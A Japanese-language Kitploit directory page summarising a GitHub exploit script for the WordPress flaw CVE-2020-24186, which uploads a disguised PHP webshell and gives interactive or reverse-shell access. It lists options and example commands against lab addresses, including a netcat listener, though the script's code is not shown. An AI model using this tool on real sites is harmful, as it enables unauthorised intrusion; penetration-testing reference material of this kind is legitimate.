Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-24186 — WordPressのCVE-2020-24186用エクスプロイトスクリプト。偽装されたPHPウェブシェルをアップロードし、インタラクティブまたはリバースシェルアクセスを提供し、オプションでpwntoolsリスナー自動化を備えています。 | Kitploit
ツール/GitHubGitHub/gazettel/cve-2020-24186
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubgazettel/cve-2020-24186

CVE-2020-24186

WordPressのCVE-2020-24186用エクスプロイトスクリプト。偽装されたPHPウェブシェルをアップロードし、インタラクティブまたはリバースシェルアクセスを提供し、オプションでpwntoolsリスナー自動化を備えています。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-24186

このスクリプトは、WordPressのCVE-2020-24186脆弱性を悪用して、偽装されたPHPペイロードをアップロードし、対象システムにシェルを取得します。以下の3つの動作モードがあります。

  1. インタラクティブシェル:
    基本的なウェブシェルをアップロードし、インタラクティブモードに入ります。これにより、cmdパラメータを通じてコマンドを送信できます。

  2. 手動リバースシェル:
    ウェブシェルをアップロードし、リバースシェルペイロードを送信しますが、自動的にはリスナーを起動しません。指定したIPとポートで、自分で手動でリスナーを起動する必要があります。

  3. pwntoolsを使用したリバースシェル:
    ウェブシェルをアップロードし、リバースシェルペイロードを送信します。スクリプトがpwntoolsを使用して自動的にリスナーを起動し、リバース接続を取得します。

必要条件

  • Python 3.x
  • Pythonライブラリ:
    • requests
    • pwn (pwntools)
  • (オプション) トラフィックをプロキシ経由でルーティングする場合のプロキシ設定(例:Burp Suiteでのテスト用)。

使用オプション

  • --url: 対象サイトのベースURL(例:http://10.10.110.119)。
  • --blogpath: 投稿へのパス(デフォルト:/?page=1)。
  • --mode: 動作モード。interactive または reverse。
  • --lhost: リバースシェル用のローカルIP(reverseモードで必須)。
  • --lport: リバースシェル用のローカルポート(reverseモードで必須)。
  • --reverse_method: リバースシェルの方法:bash、nc、またはpython(デフォルトはbash)。
  • --manual: reverseモードで使用すると、スクリプトはリスナーを起動しません。自分で手動でリスナーを起動する必要があります。
  • --use-proxy: 設定すると、リクエストが設定されたプロキシ経由で送信されます。

使用例

1. インタラクティブシェル

ウェブシェルをアップロードし、インタラクティブセッションを開始してコマンドを送信します。

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. 手動モードでのリバースシェル

ウェブシェルをアップロードし、リバースシェルペイロードを送信しますが、自動的にはリスナーを起動しません。自分で手動でリスナーを起動してください(例:netcatを使用)。

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

その後、別のターミナルで手動リスナーを起動します。

root@kitploit:~
nc -lvnp 9002

1. pwntoolsを使用したリバースシェル

ウェブシェルをアップロードし、リバースシェルペイロードを送信します。スクリプトがpwntoolsを使用して自動的にリスナーを起動し、接続を取得します。

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

スクリプトは10.10.1.1:9002で接続を待機し、接続が確立されるとインタラクティブシェルを提供します。

注意事項

  • 対象サイトがCVE-2020-24186に対して脆弱であり、セキュリティテストに必要な許可を得ていることを確認してください。
  • PHPペイロードを変更する必要がある場合は、--php_payloadオプションを使用できます。
  • --use-proxyフラグを使用する場合は、プロキシ設定を再確認してください。
ツールをダウンロード